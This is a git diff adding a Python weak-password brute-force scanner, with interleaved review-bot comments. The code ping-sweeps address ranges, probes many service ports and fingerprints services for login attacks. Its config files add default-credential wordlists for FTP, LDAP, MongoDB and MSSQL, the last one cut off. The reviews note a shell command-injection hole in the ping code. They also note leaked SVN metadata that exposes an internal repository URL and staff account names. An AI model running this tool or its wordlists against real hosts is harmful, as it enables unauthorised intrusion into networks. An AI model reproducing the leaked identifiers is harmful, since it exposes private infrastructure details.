diff --git a/Bruteforce/README.md b/Bruteforce/README.md
new file mode 100644
index 0000000..e39c5fa
--- /dev/null
+++ b/Bruteforce/README.md
@@ -0,0 +1,23 @@
+# bruteforce weak password
+# ports&*weak password scanner.
+
+$ python bruteforce.py -h
+
+
+usage: main.py [-h] [--ip IP] [--threads THREADS] [--P ISPING]
+ [--p USER_PORTS] [--file FILE]
+
+
+
+optional arguments:
+ -h, --help show this help message and exit
+
+ --ip IP ip like 192.168.1.0/24 or 192.168.0.0/16
+
+ --threads THREADS Maximum threads, default 50
+
+ --P ISPING --P not mean no ping frist,default yes
+
+ --p USER_PORTS --p scan ports;like 21,80,445 or 22-1000
+
+ --file FILE get ips or domains for this file
diff --git a/Bruteforce/bruteforce.py b/Bruteforce/bruteforce.py
new file mode 100644
index 0000000..5f603a4
--- /dev/null
+++ b/Bruteforce/bruteforce.py
@@ -0,0 +1,53 @@
+#coding=utf-8
+__author__ = 'unkonwn'
+import argparse
+from comm.printers import printPink,printRed,printGreen
+from comm.config import *
+from comm.portscan import *
+from factorys.pluginFactory import *
+
+
+#实例化config类
+c=config()
+
+if __name__ == '__main__':
+ #接受cmd参数
+ parser = argparse.ArgumentParser(description='ports&*weak password scanner. teams:xdsec. author: wilson ')
+ parser.add_argument('--ip',action="store",required=False,dest="ip",type=str,help='ip like 192.168.1.0/24 or 192.168.0.0/16')
+ parser.add_argument("--threads",action="store",required=False,dest="threads",type=int,default=50,help='Maximum threads, default 50')
+ parser.add_argument("--P",action="store",required=False,dest="isping",type=str,default='yes',help='--P not mean no ping frist,default yes')
+ parser.add_argument("--p",action="store",required=False,dest="user_ports",type=str,default='',help='--p scan ports;like 21,80,445 or 22-1000')
+ parser.add_argument("--file",action="store",required=False,dest="file",type=str,help='get ips or domains for this file')
+
+ args = parser.parse_args()
+ ip = args.ip
+ filename=args.file
+
+
+ #获取ip列表
+ if ip:
+ ips=c.getips(ip)
+ file="result/%s.txt" %args.ip.replace("/","")
+ elif filename:
+ ips=c.file2list(filename)
+ filename=filename.split("/")[-1]
+ file="result/%s.txt" %filename
+ else:
+ print "error args";exit()
+
+ isping=args.isping
+ user_posts=args.user_ports
+ threads=args.threads
+
+ p=portscan(c,user_posts)
+ p.run(isping,threads,ips,file)
+
+ #print p.ipdict,p.pinglist
+ plugins=pluginFactory(c)
+ for pluginname in plugins.pluginList:
+ #print pluginname
+ if pluginname:
+ pluginname.run(p.ipdict,p.pinglist,threads,file)
+
+
+
diff --git a/Bruteforce/comm/__init__.py b/Bruteforce/comm/__init__.py
new file mode 100644
index 0000000..e69de29
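Review bot: Nothing in this script creates the `result/` directory that `file="result/%s.txt" %args.ip.replace("/","")` and the `--file` branch point at, so the first `write_file` call in `portscan.portsscan` raises IOError only after the whole ping and port sweep has run; add `if not os.path.isdir("result"): os.makedirs("result", 0o700)` (with `import os`) before `p.run(isping,threads,ips,file)`. Restricting the mode matters because the service inventory is appended there and presumably whatever the plugins find is written to the same `file` argument — confirm what `pluginname.run` writes before relying on that. `--P` is an opaque string: anything other than the literal `yes` silently disables the ping sweep, which neither the help text (`--P not mean no ping frist`) nor a check on the value makes clear; consider `action="store_true"` with a `--no-ping` flag or validating `isping in ('yes', 'no')`. The three `from ... import *` lines hide where `config`, `portscan` and `pluginFactory` come from; import those names explicitly.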
diff --git a/Bruteforce/comm/__init__.pyc b/Bruteforce/comm/__init__.pyc
new file mode 100644
index 0000000..4d7c2e8
Binary files /dev/null and b/Bruteforce/comm/__init__.pyc differ
diff --git a/Bruteforce/comm/config.py b/Bruteforce/comm/config.py
new file mode 100644
index 0000000..0dd00e4
--- /dev/null
+++ b/Bruteforce/comm/config.py
@@ -0,0 +1,45 @@
+#coding=utf-8
+__author__ = 'wilson'
+from IPy import IP
+from comm.printers import printPink,printRed,printGreen
+
+class config(object):
+
+ def getips(self,ip):
+ iplist=[]
+ try:
+ if "-" in ip.split(".")[3]:
+ startnum=int(ip.split(".")[3].split("-")[0])
+ endnum=int(ip.split(".")[3].split("-")[1])
+ for i in range(startnum,endnum):
+ iplist.append("%s.%s.%s.%s" %(ip.split(".")[0],ip.split(".")[1],ip.split(".")[2],i))
+ else:
+ ips=IP(ip)
+ for i in ips:
+ iplist.append(str(i))
+
+ return iplist
+
+ except:
+ printRed("[!] not a valid ip given. you should put ip like 192.168.1.0/24, 192.168.0.0/16,192.168.0.1-200")
+ exit()
+
+
+ def file2list(self,file):
+ iplist=[]
+ try:
+ fh = open(file)
+ for ip in fh.readlines():
+ ip=ip.strip()
+ iplist.append(ip)
+ fh.close()
+ return iplist
+ except Exception, e:
+ print e
+ exit()
+
+
+ def write_file(self,file,contents):
+ f2 = open(file,'a+')
+ f2.write(contents)
+ f2.close()
\ No newline at end of file
diff --git a/Bruteforce/comm/config.pyc b/Bruteforce/comm/config.pyc
new file mode 100644
index 0000000..b4040d8
Binary files /dev/null and b/Bruteforce/comm/config.pyc differ
diff --git a/Bruteforce/comm/portscan.py b/Bruteforce/comm/portscan.py
new file mode 100644
index 0000000..690de9e
--- /dev/null
+++ b/Bruteforce/comm/portscan.py
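Review bot: `getips` drops the last address of a dashed range: `for i in range(startnum,endnum)` stops at `endnum-1`, so the documented `192.168.0.1-200` never scans `.200`; change it to `for i in range(startnum,endnum+1):`. The bare `except:` wrapped around the whole body also turns any internal bug (and a KeyboardInterrupt) into the "not a valid ip" message plus `exit()`, and it does not reject a range whose end is above 255 or below the start; catch `(ValueError, IndexError)` and validate both bounds explicitly. `file2list` should read the target list with `with open(file) as fh:` so the handle is closed on the error path too, and it accepts any line verbatim — a hostname or IP check here would also keep malformed entries away from the subprocess calls downstream. `except Exception, e:` is Python 2-only syntax; `except Exception as e:` works on both.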
@@ -0,0 +1,294 @@ +#coding=utf-8 +__author__ = 'wilson' +import sys +sys.path.append("../") +from comm.config import * +from comm.printers import printPink,printRed,printGreen + +import threading +from threading import Thread +from Queue import Queue +import platform +from subprocess import Popen, PIPE +import re +import time +import socket +socket.setdefaulttimeout(10) #设置了全局默认超时时间 + +class portscan(): + + """docstring for ClassName""" + def __init__(self,c,user_ports): + self.config=c + self.PROBES =[ + '\r\n\r\n', + 'GET / HTTP/1.0\r\n\r\n', + 'GET / \r\n\r\n', + '\x01\x00\x00\x00\x01\x00\x00\x00\x08\x08', + '\x80\0\0\x28\x72\xFE\x1D\x13\0\0\0\0\0\0\0\x02\0\x01\x86\xA0\0\x01\x97\x7C\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', + '\x03\0\0\x0b\x06\xe0\0\0\0\0\0', + '\0\0\0\xa4\xff\x53\x4d\x42\x72\0\0\0\0\x08\x01\x40\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x40\x06\0\0\x01\0\0\x81\0\x02PC NETWORK PROGRAM 1.0\0\x02MICROSOFT NETWORKS 1.03\0\x02MICROSOFT NETWORKS 3.0\0\x02LANMAN1.0\0\x02LM1.2X002\0\x02Samba\0\x02NT LANMAN 1.0\0\x02NT LM 0.12\0', + '\x80\x9e\x01\x03\x01\x00u\x00\x00\x00 \x00\x00f\x00\x00e\x00\x00d\x00\x00c\x00\x00b\x00\x00:\x00\x009\x00\x008\x00\x005\x00\x004\x00\x003\x00\x002\x00\x00/\x00\x00\x1b\x00\x00\x1a\x00\x00\x19\x00\x00\x18\x00\x00\x17\x00\x00\x16\x00\x00\x15\x00\x00\x14\x00\x00\x13\x00\x00\x12\x00\x00\x11\x00\x00\n\x00\x00\t\x00\x00\x08\x00\x00\x06\x00\x00\x05\x00\x00\x04\x00\x00\x03\x07\x00\xc0\x06\x00@\x04\x00\x80\x03\x00\x80\x02\x00\x80\x01\x00\x80\x00\x00\x02\x00\x00\x01\xe4i<+\xf6\xd6\x9b\xbb\xd3\x81\x9f\xbf\x15\xc1@\xa5o\x14,M \xc4\xc7\xe0\xb6\xb0\xb2\x1f\xf9)\xe8\x98', + '\x16\x03\0\0S\x01\0\0O\x03\0?G\xd7\xf7\xba,\xee\xea\xb2`~\xf3\0\xfd\x82{\xb9\xd5\x96\xc8w\x9b\xe6\xc4\xdb<=\xdbo\xef\x10n\0\0(\0\x16\0\x13\0\x0a\0f\0\x05\0\x04\0e\0d\0c\0b\0a\0`\0\x15\0\x12\0\x09\0\x14\0\x11\0\x08\0\x06\0\x03\x01\0', + '< NTP/1.2 >\n', + '< NTP/1.1 >\n', + '< NTP/1.0 >\n', + '\0Z\0\0\x01\0\0\0\x016\x01,\0\0\x08\0\x7F\xFF\x7F\x08\0\0\0\x01\0 
\0:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\04\xE6\0\0\0\x01\0\0\0\0\0\0\0\0(CONNECT_DATA=(COMMAND=version))', + '\x12\x01\x00\x34\x00\x00\x00\x00\x00\x00\x15\x00\x06\x01\x00\x1b\x00\x01\x02\x00\x1c\x00\x0c\x03\x00\x28\x00\x04\xff\x08\x00\x01\x55\x00\x00\x00\x4d\x53\x53\x51\x4c\x53\x65\x72\x76\x65\x72\x00\x48\x0f\x00\x00', + '\0\0\0\0\x44\x42\x32\x44\x41\x53\x20\x20\x20\x20\x20\x20\x01\x04\0\0\0\x10\x39\x7a\0\x01\0\0\0\0\0\0\0\0\0\0\x01\x0c\0\0\0\0\0\0\x0c\0\0\0\x0c\0\0\0\x04', + '\x01\xc2\0\0\0\x04\0\0\xb6\x01\0\0\x53\x51\x4c\x44\x42\x32\x52\x41\0\x01\0\0\x04\x01\x01\0\x05\0\x1d\0\x88\0\0\0\x01\0\0\x80\0\0\0\x01\x09\0\0\0\x01\0\0\x40\0\0\0\x01\x09\0\0\0\x01\0\0\x40\0\0\0\x01\x08\0\0\0\x04\0\0\x40\0\0\0\x01\x04\0\0\0\x01\0\0\x40\0\0\0\x40\x04\0\0\0\x04\0\0\x40\0\0\0\x01\x04\0\0\0\x04\0\0\x40\0\0\0\x01\x04\0\0\0\x04\0\0\x40\0\0\0\x01\x04\0\0\0\x02\0\0\x40\0\0\0\x01\x04\0\0\0\x04\0\0\x40\0\0\0\x01\0\0\0\0\x01\0\0\x40\0\0\0\0\x04\0\0\0\x04\0\0\x80\0\0\0\x01\x04\0\0\0\x04\0\0\x80\0\0\0\x01\x04\0\0\0\x03\0\0\x80\0\0\0\x01\x04\0\0\0\x04\0\0\x80\0\0\0\x01\x08\0\0\0\x01\0\0\x40\0\0\0\x01\x04\0\0\0\x04\0\0\x40\0\0\0\x01\x10\0\0\0\x01\0\0\x80\0\0\0\x01\x10\0\0\0\x01\0\0\x80\0\0\0\x01\x04\0\0\0\x04\0\0\x40\0\0\0\x01\x09\0\0\0\x01\0\0\x40\0\0\0\x01\x09\0\0\0\x01\0\0\x80\0\0\0\x01\x04\0\0\0\x03\0\0\x80\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\x01\x04\0\0\x01\0\0\x80\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0\0\x40\0\0\0\x01\0\0\0\0\x01\0\0\x40\0\0\0\0\x20\x20\x20\x20\x20\x20\x20\x20\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0\xff\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\xe4\x04\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x7f', + '\x41\0\0\0\x3a\x30\0\0\xff\xff\xff\xff\xd4\x07\0\0\0\0\0\0test.$cmd\0\0\0\0\0\xff\xff\xff\xff\x1b\0\0\0\x01serverStatus\0\0\0\0\0\0\0\xf0\x3f\0' + ] + self.SIGNS =self.config.file2list("conf/signs.conf") + self.ports=[] + self.getports(user_ports) + self.lock = threading.Lock() + self.pinglist=[] + self.q=Queue() + self.sp=Queue() + 
self.signs=self.prepsigns() + + self.ipdict={} + self.ipdict['ldap']=[] + self.ipdict['mysql']=[] + self.ipdict['mssql']=[] + self.ipdict['ftp']=[] + self.ipdict['ssh']=[] + self.ipdict['smb']=[] + self.ipdict['vnc']=[] + self.ipdict['pop3']=[] + self.ipdict['rsync']=[] + self.ipdict['http']=[] + self.ipdict['https']=[] + self.ipdict['mongodb']=[] + self.ipdict['postgres']=[] + self.ipdict['redis']=[] + self.ipdict['ssl']=[] + self.ipdict['Unknown']=[] + + + #获取扫描端口列表 + def getports(self,user_ports): + if user_ports=='': + self.ports=[21,22,23,80,81,443,389,445,843,873,1043,1099,1194,1433,1434,1521,2601,2604,3306,3307,3128,3389,3812,4440,4848,5432,5900,5901,5902,5903,6082,6000,6379,7001,7002,8080,8181,8888,8090,8000,8008,8009,8081,8088,8089,9000,9080,9043,9090,9091,9200,9528,10000,11211,10022,15000,16000,22022,22222,27017,28017,17017,18017,11321,50060] + else: + try: + if user_ports.find(",")>0: + for port in user_ports.split(','): + self.ports.append(int(port)) + + elif user_ports.find("-")>0: + startport=int(user_ports.split('-')[0]) + endport=int(user_ports.split('-')[1]) + for i in xrange(startport,endport+1): + self.ports.append(i) + else: + self.ports.append(int(user_ports)) + except : + printRed('[!] not a valid ports given. 
you should put ip like 22,80,1433 or 22-1000') + exit() + + #ping扫描函数 + def pinger(self): + while True: + ip=self.q.get() + if platform.system()=='Linux': + p=Popen(['ping','-c 2',ip],stdout=PIPE) + m = re.search('(\d)\sreceived', p.stdout.read()) + try: + if m.group(1)!='0': + self.pinglist.append(ip) + self.lock.acquire() + printRed("%s is live!!\r\n" % ip) + self.lock.release() + except:pass + + if platform.system()=='Darwin': + import commands + p=commands.getstatusoutput("ping -c 2 "+ip) + m = re.findall('ttl', p[1]) + try: + if m: + self.pinglist.append(ip) + self.lock.acquire() + printRed("%s is live!!\r\n" % ip) + self.lock.release() + except:pass + + if platform.system()=='Windows': + p=Popen('ping -n 2 ' + ip, stdout=PIPE) + m = re.findall('TTL', p.stdout.read()) + if m: + self.pinglist.append(ip) + self.lock.acquire() + printRed("%s is live!!\r\n" % ip) + self.lock.release() + self.q.task_done() + + + def pingscan(self,isping,threads,ips): + starttime=time.time() + friststarttime=time.time() + print "[*] start Scanning at %s" % time.ctime() + #isping=='no' 就禁ping扫描 + #默认ping 扫描 + if isping=='yes': + print "Scanning for live machines..." 
+ for i in xrange(threads): + t = Thread(target=self.pinger) + t.setDaemon(True) + t.start() + for ip in ips: + self.q.put(ip) + + self.q.join() + + else: + self.pinglist=ips + + if len(self.pinglist)==0: + print "not find any live machine - -|||" + exit() + + print "[*] Scanning for live machines done,it has Elapsed time:%s " % (time.time()-starttime) + + + + def prepsigns(self): + signlist=[] + for item in self.SIGNS: + (label,pattern)=item.split('|',2) + sign=(label,pattern) + signlist.append(sign) + return signlist + + def matchbanner(self,banner,slist): + #print banner + for item in slist: + p=re.compile(item[1]) + #print item[1] + if p.search(banner)!=None: + return item[0] + return 'Unknown' + + + #扫端口及其对应服务类型函数 + def scanports(self): + while True: + ip,port=self.sp.get() + #print ip,port + s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) + #判断端口的服务类型 + service='Unknown' + try: + s.connect((ip,port)) + except: + self.sp.task_done() + continue + + try: + result = s.recv(256) + service=self.matchbanner(result,self.signs) + except: + for probe in self.PROBES: + #print probe + try: + s.close() + sd=socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sd.settimeout(5) + sd.connect((ip,port)) + sd.send(probe) + except: + continue + try: + result=sd.recv(256) + service=self.matchbanner(result,self.signs) + if service!='Unknown': + break + except: + continue + + if service not in self.ipdict: + self.ipdict[service]=[] + self.ipdict[service].append(ip+':'+str(port)) + self.lock.acquire() + printRed("%s opening %s\r\n" %(ip,port)) + self.lock.release() + else: + self.ipdict[service].append(ip+':'+str(port)) + self.lock.acquire() + printRed("%s opening %s\r\n" %(ip,port)) + self.lock.release() + + self.sp.task_done() + + + def portsscan(self,threads,file): + print "Scanning ports now..." 
+ print "[*] start Scanning live machines' ports at %s" % time.ctime() + starttime=time.time() + + for i in xrange(threads): + st=Thread(target=self.scanports) + st.setDaemon(True) + st.start() + + for scanip in self.pinglist: + for port in self.ports: + self.sp.put((scanip,port)) + self.sp.join() + print "[*] Scanning ports done,it has Elapsed time:%s " % (time.time()-starttime) + #将服务端口 信息 记录文件 + for name in self.ipdict.keys(): + if len(self.ipdict[name]): + contents=str(name)+' service has:\n'+' '+str(self.ipdict[name])+'\n' + self.config.write_file(contents=contents,file=file) + + + #处理没有识别的服务 + def handleunknown(self): + for ip in self.ipdict['Unknown']: + #print ip + try: + if str(ip).split(':')[1]=='389': + self.ipdict['ldap'].append(ip) + if str(ip).split(':')[1]=='445': + self.ipdict['smb'].append(ip) + if str(ip).split(':')[1] in ['3306','3307','3308','3309']: + self.ipdict['mysql'].append(ip) + if str(ip).split(':')[1]=='1433': + self.ipdict['mssql'].append(ip) + if str(ip).split(':')[1] in ['10022','22']: + self.ipdict['ssh'].append(ip) + if str(ip).split(':')[1]=='27017': + self.ipdict['mongodb'].append(ip) + if str(ip).split(':')[1]=='110': + self.ipdict['pop3'].append(ip) + if str(ip).split(':')[1]=='5432': + self.ipdict['postgres'].append(ip) + if str(ip).split(':')[1]=='443': + self.ipdict['ssl'].append(ip) + if str(ip).split(':')[1]=='873': + self.ipdict['rsync'].append(ip) + if str(ip).split(':')[1]=='6379': + self.ipdict['redis'].append(ip) +# if str(ip).split(':')[1]=='21': +# self.ipdict['ftp'].append(ip) + except Exception as e: + print e + #处理被识别为http的mongo + for ip in self.ipdict['http']: + if str(ip).split(':')[1]=='27017': + self.ipdict['http'].remove(ip) + self.ipdict['mongodb'].append(ip) + + def run(self,isping,threads,ips,file): + self.pingscan(isping,threads,ips) + self.portsscan(threads,file) + self.handleunknown() + + + + + + 
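Review bot: The Darwin branch of `pinger` runs `commands.getstatusoutput("ping -c 2 "+ip)` through a shell with `ip` taken verbatim from `--ip` or from a line of the `--file` target list (which the README says may hold domain names), so a target entry containing `;`, `|` or backticks executes arbitrary commands on the scanning host; the Windows branch `Popen('ping -n 2 ' + ip, stdout=PIPE)` builds the same string form. Use the argv list on every platform, e.g. `p = Popen(['ping', '-c', '2', ip], stdout=PIPE, stderr=PIPE)`, and note that the Linux branch passes `'-c 2'` as one argument where `'-c', '2'` is intended. Separately, `scanports` never closes `s` on the banner path nor `sd` after each probe, so a 50-thread sweep of the default port list leaks file descriptors until the process exits, and `handleunknown` calls `self.ipdict['http'].remove(ip)` while iterating the same list, which skips the entry following each removal. The `if service not in self.ipdict: self.ipdict[service]=[]` check-then-set in `scanports` runs outside `self.lock`, so two threads can each create the list and one result is lost; take the lock around the dict update, not only around the print.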
diff --git a/Bruteforce/comm/portscan.pyc b/Bruteforce/comm/portscan.pyc
new file mode 100644
index 0000000..cb8e5ba
Binary files /dev/null and b/Bruteforce/comm/portscan.pyc differ
diff --git a/Bruteforce/comm/printers.py b/Bruteforce/comm/printers.py
new file mode 100644
index 0000000..8203b59
--- /dev/null
+++ b/Bruteforce/comm/printers.py
@@ -0,0 +1,78 @@
+import ctypes,sys
+import platform
+
+if platform.system()=='Linux' or platform.system()=='Darwin':
+ class colors:
+ BLACK = '\033[0;30m'
+ DARK_GRAY = '\033[1;30m'
+ LIGHT_GRAY = '\033[0;37m'
+ BLUE = '\033[0;34m'
+ LIGHT_BLUE = '\033[1;34m'
+ GREEN = '\033[0;32m'
+ LIGHT_GREEN = '\033[1;32m'
+ CYAN = '\033[0;36m'
+ LIGHT_CYAN = '\033[1;36m'
+ RED = '\033[0;31m'
+ LIGHT_RED = '\033[1;31m'
+ PURPLE = '\033[0;35m'
+ LIGHT_PURPLE = '\033[1;35m'
+ BROWN = '\033[0;33m'
+ YELLOW = '\033[1;33m'
+ WHITE = '\033[1;37m'
+ DEFAULT_COLOR = '\033[00m'
+ RED_BOLD = '\033[01;31m'
+ ENDC = '\033[0m'
+
+ def printRed(mess):
+ mess=mess.strip('\r\n')
+ print colors.RED + mess + colors.ENDC
+
+ def printPink(mess):
+ mess=mess.strip('\r\n')
+ print colors.BLUE + mess+ colors.ENDC
+
+ def printGreen(mess):
+ mess=mess.strip('\r\n')
+ print colors.GREEN + mess + colors.ENDC
+
+
+if platform.system()=='Windows':
+ STD_INPUT_HANDLE = -10
+ STD_OUTPUT_HANDLE = -11
+ STD_ERROR_HANDLE = -12
+
+ FOREGROUND_BLACK = 0x0
+ FOREGROUND_BLUE = 0x01 # text color contains blue.
+ FOREGROUND_GREEN = 0x02 # text color contains green.
+ FOREGROUND_RED = 0x04 # text color contains red.
+
+ FOREGROUND_INTENSITY = 0x08 # text color is intensified.
+ BACKGROUND_BLUE = 0x10 # background color contains blue.
+ BACKGROUND_GREEN = 0x20 # background color contains green.
+ BACKGROUND_RED = 0x40 # background color contains red.
+ BACKGROUND_INTENSITY = 0x80 # background color is intensified.
+
+
+ std_out_handle = ctypes.windll.kernel32.GetStdHandle(STD_OUTPUT_HANDLE)
+
+ def set_cmd_text_color(color, handle=std_out_handle):
+ Bool = ctypes.windll.kernel32.SetConsoleTextAttribute(handle, color)
+ return Bool
+
+ def resetColor():
+ set_cmd_text_color(FOREGROUND_RED | FOREGROUND_GREEN | FOREGROUND_BLUE)
+
+ def printRed(mess):
+ set_cmd_text_color(FOREGROUND_RED | FOREGROUND_INTENSITY)
+ sys.stdout.write(mess)
+ resetColor()
+
+ def printPink(mess):
+ set_cmd_text_color(FOREGROUND_RED | FOREGROUND_BLUE| FOREGROUND_INTENSITY)
+ print(mess)
+ resetColor()
+
+ def printGreen(mess):
+ set_cmd_text_color(FOREGROUND_GREEN | FOREGROUND_INTENSITY)
+ sys.stdout.write(mess)
+ resetColor()
diff --git a/Bruteforce/comm/printers.pyc b/Bruteforce/comm/printers.pyc
new file mode 100644
index 0000000..1995bec
Binary files /dev/null and b/Bruteforce/comm/printers.pyc differ
diff --git a/Bruteforce/conf/.DS_Store b/Bruteforce/conf/.DS_Store
new file mode 100644
index 0000000..5008ddf
Binary files /dev/null and b/Bruteforce/conf/.DS_Store differ
diff --git a/Bruteforce/conf/.svn/all-wcprops b/Bruteforce/conf/.svn/all-wcprops
new file mode 100644
index 0000000..37787f1
--- /dev/null
+++ b/Bruteforce/conf/.svn/all-wcprops
@@ -0,0 +1,11 @@
+K 25
+svn:wc:ra_dav:version-url
+V 43
+/svn/asoc/!svn/ver/2793/trunk/portScan/conf
+END
+config.txt
+K 25
+svn:wc:ra_dav:version-url
+V 54
+/svn/asoc/!svn/ver/2793/trunk/portScan/conf/config.txt
+END
diff --git a/Bruteforce/conf/.svn/entries b/Bruteforce/conf/.svn/entries
new file mode 100644
index 0000000..0dd56a2
--- /dev/null
+++ b/Bruteforce/conf/.svn/entries
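Review bot: `printRed`, `printPink` and `printGreen` are only defined when `platform.system()` is `Linux`, `Darwin` or `Windows`, so on any other system name (FreeBSD, Cygwin's `CYGWIN_NT-…`) `from comm.printers import printPink,printRed,printGreen` fails with ImportError before the scanner starts; add an `else:` branch that binds the three names to a plain `sys.stdout.write` fallback. The two backends also disagree: the POSIX versions strip `\r\n` and `print` a newline, while the Windows `printRed`/`printGreen` write `mess` verbatim and `printPink` uses `print(mess)`, so callers' `"%s is live!!\r\n"` strings render with different line endings per platform — pick one convention and apply it in all six functions. `std_out_handle` is resolved at import time and frozen as the default argument of `set_cmd_text_color`; that is fine for a CLI but deserves a comment such as `# resolved once at import; a later redirect of stdout is not reflected here`.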
@@ -0,0 +1,62 @@
+10
+
+dir
+3928
+http://weisen.cws@sources.alipay.net/svn/asoc/trunk/portScan/conf
+http://weisen.cws@sources.alipay.net/svn/asoc
+
+
+
+2014-12-16T07:44:40.829054Z
+2793
+pengliu.lp
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+4b2b8d61-1d8c-441e-9e62-9f354fa0bc87
+
+config.txt
+file
+
+
+
+
+2015-08-28T10:59:17.000000Z
+fedd5f2201b8a8c4cb5eb448e116d05b
+2014-12-16T07:44:40.829054Z
+2793
+pengliu.lp
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+72
+
diff --git a/Bruteforce/conf/.svn/text-base/config.txt.svn-base b/Bruteforce/conf/.svn/text-base/config.txt.svn-base
new file mode 100644
index 0000000..a1896d4
--- /dev/null
+++ b/Bruteforce/conf/.svn/text-base/config.txt.svn-base
@@ -0,0 +1,7 @@
+
+[global]
+task_type = 1
+
+
+[global]
+logfile = ./log/log.txt
diff --git a/Bruteforce/conf/ftp.conf b/Bruteforce/conf/ftp.conf
new file mode 100644
index 0000000..4ce1ad1
--- /dev/null
+++ b/Bruteforce/conf/ftp.conf
@@ -0,0 +1,72 @@
+ftp:ftp@163.com
+ftp:ftp
+ftp:1
+ftp:12
+ftp:123
+ftp:1234
+ftp:12345
+ftp:123456
+ftp:1234567
+ftp:12345678
+ftp:123456789
+ftp:1234567890
+ftp:654321
+ftp:54321
+ftp:00000000
+ftp:88888888
+ftp:pass
+ftp:password
+ftp:passwd
+ftp:!@#$%^
+ftp:1q2w3e
+ftp:qawsed
+ftp:pwd
+ftp:1qaz2ws3e4
+ftp:qazwsxedc
+ftp:!@#$%^&*
+ftp:ftp21
+ftp:ftppass
+ftp:ftp221
+ftp:ftppassword
+ftp:ftppasswd
+admin:1
+admin:12
+admin:admin
+admin:123
+admin:1234
+admin:12345
+admin:123456
+admin:1234567
+admin:12345678
+admin:123456789
+admin:1234567890
+admin:654321
+admin:54321
+admin:00000000
+admin:88888888
+admin:pass
+admin:password
+admin:passwd
+admin:!@#$%^
+admin:1q2w3e
+admin:qawsed
+admin:pwd
+admin:1qaz2ws3e4
+admin:qazwsxedc
+admin:!@#$%^&*
+admin:rootpass
+admin:rootpassword
+admin:rootpasswd
+test:1
+test:12
+test:123
+test:1234
+test:12345
+test:123456
+test:1234567
+test:12345678
+test:123123
+test:123456789
+test:test
+test:654321
+test:54321
\ No newline at end of file
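Review bot: SVN working-copy metadata does not belong in this commit: `.svn/entries` exposes an internal repository URL carrying an account name (`http://weisen.cws@sources.alipay.net/svn/asoc/...`) and committer identities (`pengliu.lp`), and `conf/.svn/all-wcprops`, `conf/.DS_Store` and the `*.pyc` files added elsewhere in this change are the same class of local artefact. Remove `Bruteforce/conf/.svn/`, `.DS_Store` and the compiled files from the tree and add `.svn/`, `.DS_Store` and `*.pyc` to a `.gitignore`. Because the URL and names stay recoverable from git history once pushed, do this before the repository is published, or rewrite the history afterwards.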
diff --git a/Bruteforce/conf/ldapd.conf b/Bruteforce/conf/ldapd.conf
new file mode 100644
index 0000000..0c6e377
--- /dev/null
+++ b/Bruteforce/conf/ldapd.conf
@@ -0,0 +1,27 @@
+Anonymous:
+Manager:123456
+Manager:secret
+Manager:1
+Manager:12
+Manager:123
+Manager:1234
+Manager:12345
+Manager:123456
+Manager:1234567
+Manager:12345678
+Manager:123456789
+Manager:1234567890
+Manager:654321
+Manager:54321
+Manager:00000000
+Manager:88888888
+Manager:pass
+Manager:password
+Manager:passwd
+Manager:!@#$%^
+Manager:1q2w3e
+Manager:qawsed
+Manager:pwd
+Manager:1qaz2ws3e4
+Manager:qazwsxedc
+Manager:!@#$%^&*
\ No newline at end of file
diff --git a/Bruteforce/conf/mongodb.conf b/Bruteforce/conf/mongodb.conf
new file mode 100644
index 0000000..00db698
--- /dev/null
+++ b/Bruteforce/conf/mongodb.conf
@@ -0,0 +1,115 @@
+anonymous:
+mongodb:1
+mongodb:12
+mongodb:123
+mongodb:1234
+mongodb:12345
+mongodb:123456
+mongodb:1234567
+mongodb:12345678
+mongodb:123456789
+mongodb:1234567890
+mongodb:654321
+mongodb:54321
+mongodb:mongodb
+mongodb:00000000
+mongodb:88888888
+mongodb:pass
+mongodb:password
+mongodb:passwd
+mongodb:!@#$%^
+mongodb:1q2w3e
+mongodb:qawsed
+mongodb:pwd
+mongodb:1qaz2ws3e4
+mongodb:qazwsxedc
+mongodb:!@#$%^&*
+mongodb:rootpass
+mongodb:rootpassword
+mongodb:rootpasswd
+root:1
+root:12
+root:root
+root:root123
+root:root123456
+root:123
+root:1234
+root:12345
+root:123456
+root:1234567
+root:12345678
+root:123456789
+root:1234567890
+root:654321
+root:54321
+root:00000000
+root:88888888
+root:pass
+root:password
+root:passwd
+root:!@#$%^
+root:1q2w3e
+root:qawsed
+root:pwd
+root:test
+root:qwe123
+root:1qaz2ws3e4
+root:qazwsxedc
+root:!@#$%^&*
+root:root123
+root:root123456
+root:rootpass
+root:rootpassword
+root:rootpasswd
+root:admin
+root:admin123
+root:-
+root:_
+root:1qaz2wsx
+root:666666
+root:888888
+root:123123
+root:toor
+root:123abc
+root:passw0rd
+admin:1
+admin:12
+admin:admin
+admin:123
+admin:1234
+admin:12345
+admin:123456
+admin:1234567
+admin:12345678
+admin:123456789
+admin:1234567890
+admin:654321
+admin:54321
+admin:00000000
+admin:88888888
+admin:pass
+admin:password
+admin:passwd
+admin:!@#$%^
+admin:1q2w3e
+admin:qawsed
+admin:pwd
+admin:1qaz2ws3e4
+admin:qazwsxedc
+admin:!@#$%^&*
+admin:rootpass
+admin:rootpassword
+admin:rootpasswd
+test:1
+test:12
+test:123
+test:1234
+test:12345
+test:123456
+test:1234567
+test:123123
+test:12345678
+test:123456789
+test:test
+test:654321
+test:54321
\ No newline at end of file
diff --git a/Bruteforce/conf/mssql.conf b/Bruteforce/conf/mssql.conf
new file mode 100644
index 0000000..8c8042a
--- /dev/null
+++ b/Bruteforce/conf/mssql.conf
@@ -0,0 +1,33 @@
+sa:1
+sa:
+sa:sa
+sa:sa123
+sa:12
+sa:123
+sa:1234
+sa:12345
+sa:123456
+sa:1234567
+sa:12345678
+sa:123456789
+sa:1234567890
+sa:654321
+sa:54321
+sa:00000000
+sa:88888888
+sa:pass
+sa:password
+sa:passwd
+sa:!@#$%^
+sa:1q2w3e
+sa:qawsed
+sa:pwd
